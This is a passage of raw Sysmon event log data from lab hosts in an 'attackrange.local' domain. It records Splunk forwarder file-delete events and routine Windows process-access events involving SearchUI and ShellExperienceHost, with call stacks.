23542300x80000000000000001056329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:44.623{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA7FFB5F6B189D551298A85346B5E288,SHA256=93A4945C24F7ACF24B59A9076BEC966964932153A9C80DF20ABD8AA6750EE95E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:44.040{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F763039118B02C5F73D258DA429883D2,SHA256=A4CEACB122983008670497E6FDCC98C091573AEF9B9DD09F5FBD748C72F609A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:45.196{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2A937A938EFE2704D3B130B7FEAA76,SHA256=9344B7976DE6B769EACE4CD1D6286EF5929EEE7D5A02738D1F4634C963FCFA2A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.453{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.453{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.310{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.310{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.310{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.310{5EBD8912-8D2A-6151-9600-00000000FD01}46324580C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.280{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001056354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.280{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+76e7a|C:\Windows\System32\combase.dll+6dc4d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\combase.dll+3b283|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001056353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.232{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.232{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.217{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.201{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001056349Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.201{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001056348Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 